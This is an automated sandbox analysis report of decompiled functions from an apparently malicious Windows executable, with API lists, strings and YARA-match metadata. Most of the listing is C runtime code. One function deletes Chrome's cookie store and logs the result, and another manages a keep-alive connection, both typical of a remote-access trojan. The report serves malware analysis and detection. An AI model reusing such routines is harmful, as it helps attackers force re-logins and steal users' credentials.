                              									}
                              									_t33 = _t443 + 0x24; // 0x30ff0c46
                              									__eflags =  *_t33;
                              									if( *_t33 != 0) {
                              										asm("lock xadd [eax], edi");
                              										__eflags = _t434 == 1;
                              										if(_t434 == 1) {
                              											_t34 = _t443 + 0x24; // 0x30ff0c46
                              											L0043EE85( *_t34);
                              										}
                              									}
                              									 *(_t443 + 0x24) = 0;
                              									 *(_t443 + 0x1c) = 0;
                              									 *(_t443 + 0x28) = 0;
                              									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                              									_t39 = _t443 + 0x40; // 0x10468b00
                              									_t240 =  *_t39;
                              								} else {
                              									_t20 = _t443 + 0x28; // 0x30ff068b
                              									_t437 = _t427 | 0xffffffff;
                              									_t491 =  *_t20;
                              									if(_t491 != 0) {
                              										asm("lock xadd [ecx], eax");
                              										if(_t491 == 0) {
                              											_t21 = _t443 + 0x28; // 0x30ff068b
                              											L0043EE85( *_t21);
                              										}
                              									}
                              									_t22 = _t443 + 0x24; // 0x30ff0c46
                              									if( *_t22 != 0) {
                              										asm("lock xadd [eax], edi");
                              										if(_t437 == 1) {
                              											_t23 = _t443 + 0x24; // 0x30ff0c46
                              											L0043EE85( *_t23);
                              										}
                              									}
                              									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                              									_t26 = _t357 + 4; // 0x4
                              									_t240 = _t26;
                              									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                              									 *(_t443 + 0x28) = _t357;
                              									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                              								}
                              								goto L20;
                              							}
                              							goto L130;
                              						}
                              						asm("sbb eax, eax");
                              						_t340 = _t339 | 0x00000001;
                              						__eflags = _t340;
                              						goto L10;
                              					}
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					E0043629A();
                              					asm("int3");
                              					_push(_t461);
                              					_t463 = _t471;
                              					_t472 = _t471 - 0x1d0;
                              					_t247 =  *0x46a00c; // 0x7df2b874
                              					_v56 = _t247 ^ _t463;
                              					_t249 = _v40;
                              					_push(_t357);
                              					_push(_t443);
                              					_t444 = _v36;
                              					_push(_t427);
                              					_t428 = _v44;
                              					_v508 = _t428;
                              					__eflags = _t249;
                              					if(_t249 == 0) {
                              						_v456 = 1;
                              						_v468 = 0;
                              						_t359 = 0;
                              						_v452 = 0;
                              						__eflags = _t444;
                              						if(__eflags == 0) {
                              							L79:
                              							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                              							goto L80;
                              						} else {
                              							__eflags =  *_t444 - 0x4c;
                              							if( *_t444 != 0x4c) {
                              								L58:
                              								_push(0);
                              								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                              								_t474 = _t472 + 0x18;
                              								__eflags = _t255;
                              								if(_t255 != 0) {
                              									_t370 = 0;
                              									__eflags = 0;
                              									_t76 = _t428 + 0x20; // 0x43c9d0
                              									_t421 = _t76;
                              									_t446 = 0;
                              									_v452 = _t421;
                              									do {
                              										__eflags = _t446;
                              										if(_t446 == 0) {
                              											L73:
                              											_t256 = _v456;
                              										} else {
                              											_t374 =  *_t421;
                              											_t257 =  &_v276;
                              											while(1) {
                              												__eflags =  *_t257 -  *_t374;
                              												_t428 = _v464;
                              												if( *_t257 !=  *_t374) {
                              													break;
                              												}
                              												__eflags =  *_t257;
                              												if( *_t257 == 0) {
                              													L66:
                              													_t370 = 0;
                              													_t258 = 0;
                              												} else {
                              													_t422 =  *((intOrPtr*)(_t257 + 2));
                              													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                              													_v458 = _t422;
                              													_t421 = _v452;
                              													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                              														break;
                              													} else {
                              														_t257 = _t257 + 4;
                              														_t374 = _t374 + 4;
                              														__eflags = _v458;
                              														if(_v458 != 0) {
                              															continue;
                              														} else {
                              															goto L66;
                              														}
                              													}
                              												}
                              												L68:
                              												__eflags = _t258;
                              												if(_t258 == 0) {
                              													_t359 = _t359 + 1;
                              													__eflags = _t359;
                              													goto L73;
                              												} else {
                              													_t259 =  &_v276;
                              													_push(_t259);
                              													_push(_t446);
                              													_push(_t428);
                              													L83();
                              													_t421 = _v452;
                              													_t474 = _t474 + 0xc;
                              													__eflags = _t259;
                              													if(_t259 == 0) {
                              														_t370 = 0;
                              														_t256 = 0;
                              														_v456 = 0;
                              													} else {
                              														_t359 = _t359 + 1;
                              														_t370 = 0;
                              														goto L73;
                              													}
                              												}
                              												goto L74;
                              											}
                              											asm("sbb eax, eax");
                              											_t258 = _t257 | 0x00000001;
                              											_t370 = 0;
                              											__eflags = 0;
                              											goto L68;
                              										}
                              										L74:
                              										_t446 = _t446 + 1;
                              										_t421 = _t421 + 0x10;
                              										_v452 = _t421;
                              										__eflags = _t446 - 5;
                              									} while (_t446 <= 5);
                              									__eflags = _t256;
                              									if(__eflags != 0) {
                              										goto L79;
                              									} else {
                              										__eflags = _t359;
                              										goto L77;
                              									}
                              								}
                              								goto L80;
                              							} else {
                              								__eflags =  *(_t444 + 2) - 0x43;
                              								if( *(_t444 + 2) != 0x43) {
                              									goto L58;
                              								} else {
                              									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                              									if( *((short*)(_t444 + 4)) != 0x5f) {
                              										goto L58;
                              									} else {
                              										while(1) {
                              											_t261 = L00447F17(_t444, 0x457480);
                              											_t361 = _t261;
                              											_v472 = _t361;
                              											_pop(_t376);
                              											__eflags = _t361;
                              											if(_t361 == 0) {
                              												break;
                              											}
                              											_t263 = _t261 - _t444;
                              											__eflags = _t263;
                              											_v456 = _t263 >> 1;
                              											if(_t263 == 0) {
                              												break;
                              											} else {
                              												_t265 = 0x3b;
                              												__eflags =  *_t361 - _t265;
                              												if( *_t361 == _t265) {
                              													break;
                              												} else {
                              													_t431 = _v456;
                              													_t362 = 0x457344;
                              													_v460 = 1;
                              													do {
                              														_t266 = L00447EDD( *_t362, _t444, _t431);
                              														_t472 = _t472 + 0xc;
                              														__eflags = _t266;
                              														if(_t266 != 0) {
                              															goto L45;
                              														} else {
                              															_t377 =  *_t362;
                              															_t420 = _t377 + 2;
                              															do {
                              																_t334 =  *_t377;
                              																_t377 = _t377 + 2;
                              																__eflags = _t334 - _v468;
                              															} while (_t334 != _v468);
                              															_t376 = _t377 - _t420 >> 1;
                              															__eflags = _t431 - _t377 - _t420 >> 1;
                              															if(_t431 != _t377 - _t420 >> 1) {
                              																goto L45;
                              															}
                              														}
                              														break;
                              														L45:
                              														_v460 = _v460 + 1;
                              														_t362 = _t362 + 0xc;
                              														__eflags = _t362 - 0x457374;
                              													} while (_t362 <= 0x457374);
                              													_t359 = _v472 + 2;
                              													_t267 = L00447E8D(_t376, _t359, ";");
                              													_t428 = _v464;
                              													_t447 = _t267;
                              													_pop(_t380);
                              													__eflags = _t447;
                              													if(_t447 != 0) {
                              														L48:
                              														__eflags = _v460 - 5;
                              														if(_v460 > 5) {
                              															_t268 = _v452;
                              															goto L54;
                              														} else {
                              															_push(_t447);
                              															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
                              															_t475 = _t472 + 0x10;
                              															__eflags = _t270;
                              															if(_t270 != 0) {
                              																L82:
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																_push(0);
                              																E0043629A();
                              																asm("int3");
                              																_push(_t463);
                              																_t465 = _t475;
                              																_v556 =  *0x46a00c ^ _t465;
                              																_push(_t359);
                              																_t364 = _v540;
                              																_push(_t447);
                              																_push(_t428);
                              																_t432 = _v544;
                              																_v1292 = _t364;
                              																_v1276 = L00440972(_t364, _t380, _t420) + 0x278;
                              																_push( &_v1256);
                              																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                              																_t477 = _t475 - 0x2e4 + 0x18;
                              																__eflags = _t280;
                              																if(_t280 != 0) {
                              																	_t450 = _t364 + 2 << 4;
                              																	__eflags = _t450;
                              																	_t281 =  &_v280;
                              																	_v724 = _t450;
                              																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                              																	while(1) {
                              																		_v712 = _v712 & 0x00000000;
                              																		__eflags =  *_t281 -  *_t381;
                              																		_t452 = _v724;
                              																		if( *_t281 !=  *_t381) {
                              																			break;
                              																		}
                              																		__eflags =  *_t281;
                              																		if( *_t281 == 0) {
                              																			L91:
                              																			_t282 = _v712;
                              																		} else {
                              																			_t459 =  *((intOrPtr*)(_t281 + 2));
                              																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                              																			_v718 = _t459;
                              																			_t452 = _v724;
                              																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                              																				break;
                              																			} else {
                              																				_t281 = _t281 + 4;
                              																				_t381 = _t381 + 4;
                              																				__eflags = _v718;
                              																				if(_v718 != 0) {
                              																					continue;
                              																				} else {
                              																					goto L91;
                              																				}
                              																			}
                              																		}
                              																		L93:
                              																		__eflags = _t282;
                              																		if(_t282 != 0) {
                              																			_t382 =  &_v280;
                              																			_t424 = _t382 + 2;
                              																			do {
                              																				_t283 =  *_t382;
                              																				_t382 = _t382 + 2;
                              																				__eflags = _t283 - _v712;
                              																			} while (_t283 != _v712);
                              																			_v728 = (_t382 - _t424 >> 1) + 1;
                              																			_t286 = L0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                              																			_v740 = _t286;
                              																			__eflags = _t286;
                              																			if(_t286 == 0) {
                              																				goto L84;
                              																			} else {
                              																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                              																				_v744 =  *(_t432 + 0xa0 + _t364 * 4);
                              																				_v748 =  *(_t432 + 8);
                              																				_t391 =  &_v280;
                              																				_v720 = _t286 + 4;
                              																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
                              																				_t479 = _t477 + 0xc;
                              																				__eflags = _t290;
                              																				if(_t290 != 0) {
                              																					_t291 = _v712;
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					_push(_t291);
                              																					E0043629A();
                              																					asm("int3");
                              																					return  *0x46b508;
                              																				} else {
                              																					__eflags = _v280 - 0x43;
                              																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                              																					if(_v280 != 0x43) {
                              																						L102:
                              																						_t296 = L0043CAB6(_t364, _t391, _t432,  &_v708);
                              																						_t393 = _v712;
                              																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                              																					} else {
                              																						__eflags = _v278;
                              																						if(_v278 != 0) {
                              																							goto L102;
                              																						} else {
                              																							_t393 = _v712;
                              																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                              																						}
                              																					}
                              																					__eflags = _t364 - 2;
                              																					if(_t364 != 2) {
                              																						__eflags = _t364 - 1;
                              																						if(_t364 != 1) {
                              																							__eflags = _t364 - 5;
                              																							if(_t364 == 5) {
                              																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                              																							}
                              																						} else {
                              																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                              																						}
                              																					} else {
                              																						_t457 = _v736;
                              																						_t425 = _t393;
                              																						_t403 = _t457;
                              																						 *(_t432 + 8) = _v716;
                              																						_v720 = _t457;
                              																						_v728 = _t457[8];
                              																						_v716 = _t457[9];
                              																						while(1) {
                              																							__eflags =  *(_t432 + 8) -  *_t403;
                              																							if( *(_t432 + 8) ==  *_t403) {
                              																								break;
                              																							}
                              																							_t458 = _v720;
                              																							_t425 = _t425 + 1;
                              																							_t328 =  *_t403;
                              																							 *_t458 = _v728;
                              																							_v716 = _t403[1];
                              																							_t403 = _t458 + 8;
                              																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                              																							_t364 = _v752;
                              																							_t457 = _v736;
                              																							_v728 = _t328;
                              																							_v720 = _t403;
                              																							__eflags = _t425 - 5;
                              																							if(_t425 < 5) {
                              																								continue;
                              																							} else {
                              																							}
                              																							L110:
                              																							__eflags = _t425 - 5;
                              																							if(__eflags == 0) {
                              																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *(_t432 + 8), 1);
                              																								_t479 = _t479 + 0x1c;
                              																								__eflags = _t319;
                              																								_t320 = _v712;
                              																								if(_t319 == 0) {
                              																									_t457[1] = _t320;
                              																								} else {
                              																									do {
                              																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                              																										_t320 = _t320 + 1;
                              																										__eflags = _t320 - 0x7f;
                              																									} while (_t320 < 0x7f);
                              																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
                              																									_t479 = _t479 + 0xc;
                              																									__eflags = _t323;
                              																									_t457[1] = 0 | _t323 == 0x00000000;
                              																								}
                              																								 *_t457 =  *(_t432 + 8);
                              																							}
                              																							 *(_t432 + 0x18) = _t457[1];
                              																							goto L121;
                              																						}
                              																						__eflags = _t425;
                              																						if(_t425 != 0) {
                              																							 *_t457 =  *(_t457 + _t425 * 8);
                              																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                              																							 *(_t457 + _t425 * 8) = _v728;
                              																							 *(_t457 + 4 + _t425 * 8) = _v716;
                              																						}
                              																						goto L110;
                              																					}
                              																					L121:
                              																					 *0x45346c(_t432);
                              																					_t299 =  *((intOrPtr*)( *((intOrPtr*)(0x457340 + _t364 * 0xc))))();
                              																					_t396 = _v732;
                              																					__eflags = _t299;
                              																					if(_t299 == 0) {
                              																						__eflags = _t396 - 0x46a2a8;
                              																						if(_t396 != 0x46a2a8) {
                              																							_t456 = _t364 + _t364;
                              																							__eflags = _t456;
                              																							asm("lock xadd [eax], ecx");
                              																							if(_t456 != 0) {
                              																								goto L126;
                              																							} else {
                              																								L0043EE85( *((intOrPtr*)(_t432 + 0x28 + _t456 * 8)));
                              																								L0043EE85( *((intOrPtr*)(_t432 + 0x24 + _t456 * 8)));
                              																								L0043EE85( *(_t432 + 0xa0 + _t364 * 4));
                              																								_t399 = _v712;
                              																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                              																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                              																							}
                              																						}
                              																						_t397 = _v740;
                              																						 *_t397 = 1;
                              																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                              																					} else {
                              																						 *(_v724 + _t432) = _t396;
                              																						L0043EE85( *(_t432 + 0xa0 + _t364 * 4));
                              																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                              																						L0043EE85(_v740);
                              																						 *(_t432 + 8) = _v748;
                              																						goto L84;
                              																					}
                              																					goto L85;
                              																				}
                              																			}
                              																		} else {
                              																			goto L85;
                              																		}
                              																		goto L130;
                              																	}
                              																	asm("sbb eax, eax");
                              																	_t282 = _t281 | 0x00000001;
                              																	__eflags = _t282;
                              																	goto L93;
                              																} else {
                              																	L84:
                              																	__eflags = 0;
                              																	L85:
                              																	__eflags = _v16 ^ _t465;
                              																	return L0042F61B(_v16 ^ _t465);
                              																}
                              															} else {
                              																_t330 = _t447 + _t447;
                              																__eflags = _t330 - 0x106;
                              																if(_t330 >= 0x106) {
                              																	L0042F74F();
                              																	goto L82;
                              																} else {
                              																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                              																	_t332 =  &_v276;
                              																	_push(_t332);
                              																	_push(_v460);
                              																	_push(_t428);
                              																	L83();
                              																	_t472 = _t475 + 0xc;
                              																	__eflags = _t332;
                              																	_t268 = _v452;
                              																	if(_t332 != 0) {
                              																		_t268 = _t268 + 1;
                              																		_v452 = _t268;
                              																	}
                              																	L54:
                              																	_t444 = _t359 + _t447 * 2;
                              																	_t370 = 0;
                              																	__eflags =  *_t444;
                              																	if( *_t444 == 0) {
                              																		L56:
                              																		__eflags = _t268;
                              																		L77:
                              																		if(__eflags != 0) {
                              																			goto L79;
                              																		} else {
                              																		}
                              																		goto L80;
                              																	} else {
                              																		_t444 = _t444 + 2;
                              																		__eflags =  *_t444;
                              																		if( *_t444 != 0) {
                              																			continue;
                              																		} else {
                              																			goto L56;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t333 = 0x3b;
                              														__eflags =  *_t359 - _t333;
                              														if( *_t359 != _t333) {
                              															break;
                              														} else {
                              															goto L48;
                              														}
                              													}
                              												}
                              											}
                              											goto L130;
                              										}
                              										goto L80;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						__eflags = _t444;
                              						if(_t444 != 0) {
                              							_push(_t444);
                              							_push(_t249);
                              							_push(_t428);
                              							L83();
                              						}
                              						L80:
                              						__eflags = _v12 ^ _t463;
                              						return L0042F61B(_v12 ^ _t463);
                              					}
                              				}
                              				L130:
                              			}
                              0x0043d46e
                              0x0043d471
                              0x0043d471
                              0x0043d47c
                              0x0043d47e
                              0x0043d480
                              0x00000000
                              0x00000000
                              0x0043d480
                              0x00000000
                              0x0043d482
                              0x0043d482
                              0x0043d488
                              0x0043d48b
                              0x0043d48b
                              0x0043d499
                              0x0043d4a2
                              0x0043d4a7
                              0x0043d4ad
                              0x0043d4b0
                              0x0043d4b1
                              0x0043d4b3
                              0x0043d4c1
                              0x0043d4c1
                              0x0043d4c8
                              0x0043d529
                              0x00000000
                              0x0043d4ca
                              0x0043d4ca
                              0x0043d4d8
                              0x0043d4dd
                              0x0043d4e0
                              0x0043d4e2
                              0x0043d652
                              0x0043d654
                              0x0043d655
                              0x0043d656
                              0x0043d657
                              0x0043d658
                              0x0043d659
                              0x0043d65e
                              0x0043d661
                              0x0043d662
                              0x0043d671
                              0x0043d674
                              0x0043d675
                              0x0043d678
                              0x0043d67c
                              0x0043d67d
                              0x0043d680
                              0x0043d690
                              0x0043d69c
                              0x0043d6b3
                              0x0043d6b8
                              0x0043d6bb
                              0x0043d6bd
                              0x0043d6d5
                              0x0043d6d5
                              0x0043d6d8
                              0x0043d6de
                              0x0043d6e7
                              0x0043d6e9
                              0x0043d6ec
                              0x0043d6f3
                              0x0043d6f6
                              0x0043d6fc
                              0x00000000
                              0x00000000
                              0x0043d6fe
                              0x0043d702
                              0x0043d72b
                              0x0043d72b
                              0x0043d704
                              0x0043d704
                              0x0043d708
                              0x0043d70c
                              0x0043d713
                              0x0043d719
                              0x00000000
                              0x0043d71b
                              0x0043d71b
                              0x0043d71e
                              0x0043d721
                              0x0043d729
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d729
                              0x0043d719
                              0x0043d738
                              0x0043d738
                              0x0043d73a
                              0x0043d740
                              0x0043d746
                              0x0043d749
                              0x0043d749
                              0x0043d74c
                              0x0043d74f
                              0x0043d74f
                              0x0043d75f
                              0x0043d76d
                              0x0043d772
                              0x0043d779
                              0x0043d77b
                              0x00000000
                              0x0043d781
                              0x0043d787
                              0x0043d794
                              0x0043d79d
                              0x0043d7a3
                              0x0043d7b0
                              0x0043d7b7
                              0x0043d7bc
                              0x0043d7bf
                              0x0043d7c1
                              0x0043da1a
                              0x0043da20
                              0x0043da21
                              0x0043da22
                              0x0043da23
                              0x0043da24
                              0x0043da25
                              0x0043da2a
                              0x0043da30
                              0x0043d7c7
                              0x0043d7c7
                              0x0043d7d5
                              0x0043d7d8
                              0x0043d7f3
                              0x0043d7fa
                              0x0043d800
                              0x0043d806
                              0x0043d7da
                              0x0043d7da
                              0x0043d7e2
                              0x00000000
                              0x0043d7e4
                              0x0043d7e4
                              0x0043d7ea
                              0x0043d7ea
                              0x0043d7e2
                              0x0043d80d
                              0x0043d810
                              0x0043d92d
                              0x0043d930
                              0x0043d93d
                              0x0043d940
                              0x0043d948
                              0x0043d948
                              0x0043d932
                              0x0043d938
                              0x0043d938
                              0x0043d816
                              0x0043d816
                              0x0043d81c
                              0x0043d824
                              0x0043d826
                              0x0043d829
                              0x0043d832
                              0x0043d83b
                              0x0043d841
                              0x0043d844
                              0x0043d846
                              0x00000000
                              0x00000000
                              0x0043d848
                              0x0043d84e
                              0x0043d84f
                              0x0043d85a
                              0x0043d862
                              0x0043d86a
                              0x0043d86d
                              0x0043d870
                              0x0043d876
                              0x0043d87c
                              0x0043d882
                              0x0043d888
                              0x0043d88b
                              0x00000000
                              0x00000000
                              0x0043d88d
                              0x0043d8b2
                              0x0043d8b2
                              0x0043d8b5
                              0x0043d8d2
                              0x0043d8d7
                              0x0043d8da
                              0x0043d8dc
                              0x0043d8e2
                              0x0043d91d
                              0x0043d8e4
                              0x0043d8e4
                              0x0043d8e9
                              0x0043d8f1
                              0x0043d8f2
                              0x0043d8f2
                              0x0043d909
                              0x0043d910
                              0x0043d913
                              0x0043d918
                              0x0043d918
                              0x0043d923
                              0x0043d923
                              0x0043d928
                              0x00000000
                              0x0043d928
                              0x0043d88f
                              0x0043d891
                              0x0043d896
                              0x0043d89c
                              0x0043d8a5
                              0x0043d8ae
                              0x0043d8ae
                              0x00000000
                              0x0043d891
                              0x0043d94b
                              0x0043d957
                              0x0043d95d
                              0x0043d960
                              0x0043d966
                              0x0043d968
                              0x0043d9a8
                              0x0043d9ae
                              0x0043d9b5
                              0x0043d9b5
                              0x0043d9bb
                              0x0043d9bf
                              0x00000000
                              0x0043d9c1
                              0x0043d9c5
                              0x0043d9ce
                              0x0043d9da
                              0x0043d9e8
                              0x0043d9ee
                              0x0043d9f1
                              0x0043d9f1
                              0x0043d9bf
                              0x0043da00
                              0x0043da08
                              0x0043da11
                              0x0043d96a
                              0x0043d970
                              0x0043d97a
                              0x0043d98c
                              0x0043d993
                              0x0043d9a0
                              0x00000000
                              0x0043d9a0
                              0x00000000
                              0x0043d968
                              0x0043d7c1
                              0x0043d73c
                              0x00000000
                              0x0043d73c
                              0x00000000
                              0x0043d73a
                              0x0043d733
                              0x0043d735
                              0x0043d735
                              0x00000000
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6c1
                              0x0043d6c6
                              0x0043d6d1
                              0x0043d6d1
                              0x0043d4e8
                              0x0043d4e8
                              0x0043d4eb
                              0x0043d4f0
                              0x0043d64d
                              0x00000000
                              0x0043d4f6
                              0x0043d4f8
                              0x0043d500
                              0x0043d506
                              0x0043d507
                              0x0043d50d
                              0x0043d50e
                              0x0043d513
                              0x0043d516
                              0x0043d518
                              0x0043d51e
                              0x0043d520
                              0x0043d521
                              0x0043d521
                              0x0043d52f
                              0x0043d52f
                              0x0043d532
                              0x0043d534
                              0x0043d537
                              0x0043d545
                              0x0043d545
                              0x0043d62f
                              0x0043d62f
                              0x00000000
                              0x0043d631
                              0x0043d631
                              0x00000000
                              0x0043d539
                              0x0043d539
                              0x0043d53c
                              0x0043d53f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d53f
                              0x0043d537
                              0x0043d4f0
                              0x0043d4e2
                              0x0043d4b5
                              0x0043d4b7
                              0x0043d4b8
                              0x0043d4bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d4bb
                              0x0043d4b3
                              0x0043d43b
                              0x00000000
                              0x0043d42f
                              0x00000000
                              0x0043d54c
                              0x0043d402
                              0x0043d3f7
                              0x0043d3ec
                              0x0043d3a5
                              0x0043d3a5
                              0x0043d3a7
                              0x0043d3a9
                              0x0043d3aa
                              0x0043d3ab
                              0x0043d3ac
                              0x0043d3b1
                              0x0043d63c
                              0x0043d641
                              0x0043d64c
                              0x0043d64c
                              0x0043d3a3
                              0x00000000

                              APIs
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • _free.LIBCMT ref: 0043D2EC
                              • _free.LIBCMT ref: 0043D303
                              • _free.LIBCMT ref: 0043D322
                              • _free.LIBCMT ref: 0043D33D
                              • _free.LIBCMT ref: 0043D354
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$AllocHeap
                              • String ID: sE
                              • API String ID: 1835388192-3868527542
                              • Opcode ID: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
                              • Opcode Fuzzy Hash: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0040A320(void* __edi, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				void* __ebx;
                              				void* __ebp;
                              				long _t18;
                              				void* _t20;
                              				void* _t21;
                              				void* _t28;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t35 = __eflags;
                              				_t31 = __edi;
                              				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
                              				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                              				L00401FA7();
                              				if(DeleteFileA(L00401F75( &_v28)) != 0) {
                              					_t28 = _t32 - 0x18;
                              					_push("\n[Chrome Cookies found, cleared!]");
                              					goto L6;
                              				} else {
                              					_t18 = GetLastError();
                              					if(_t18 == 0 || _t18 == 1) {
                              						_t28 = _t32 - 0x18;
                              						_push("\n[Chrome Cookies not found]");
                              						L6:
                              						E00402064(_t20, _t28);
                              						L0040AA8C(_t20, _t30, __eflags);
                              						_t21 = 1;
                              					} else {
                              						_t21 = 0;
                              					}
                              				}
                              				L00401FA7();
                              				return _t21;
                              			}

                              0x0040a320
                              0x0040a320
                              0x0040a340
                              0x0040a345
                              0x0040a34e
                              0x0040a364
                              0x0040a38a
                              0x0040a38c
                              0x00000000
                              0x0040a366
                              0x0040a36d
                              0x0040a370
                              0x0040a37e
                              0x0040a380
                              0x0040a391
                              0x0040a391
                              0x0040a396
                              0x0040a39b
                              0x0040a377
                              0x0040a377
                              0x0040a377
                              0x0040a370
                              0x0040a3a3
                              0x0040a3ae

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
                              • GetLastError.KERNEL32 ref: 0040A366
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
                              • UserProfile, xrefs: 0040A32C
                              • [Chrome Cookies not found], xrefs: 0040A380
                              • [Chrome Cookies found, cleared!], xrefs: 0040A38C
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: 70a1b1cb6d7a7f33da873a93c86b3163fccb599da4993ef9213784b14d4c6033
                              • Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
                              • Opcode Fuzzy Hash: 70a1b1cb6d7a7f33da873a93c86b3163fccb599da4993ef9213784b14d4c6033
                              • Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E004050E5(void* __ecx, void* __edi, char _a4) {
                              				void* _t17;
                              				void* _t22;
                              				void* _t23;
                              
                              				_t22 = __ecx;
                              				if( *((char*)(__ecx + 0x50)) == 0) {
                              					return 0;
                              				}
                              				if(_a4 == 0) {
                              					_t24 = _t23 - 0x18;
                              					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
                              					E00402064(_t17, _t24 - 0x18, "[WARNING]");
                              					L004165D8(_t17, __edi);
                              				}
                              				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                              				SetEvent( *(_t22 + 0x54));
                              				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                              				CloseHandle( *(_t22 + 0x58));
                              				return 1;
                              			}

                              0x004050e9
                              0x004050ef
                              0x00000000
                              0x0040514d
                              0x004050f5
                              0x004050f7
                              0x00405101
                              0x00405110
                              0x00405115
                              0x0040511a
                              0x0040512c
                              0x0040512f
                              0x0040513a
                              0x00405143
                              0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405123
                              • SetEvent.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040512F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040513A
                              • CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405143
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
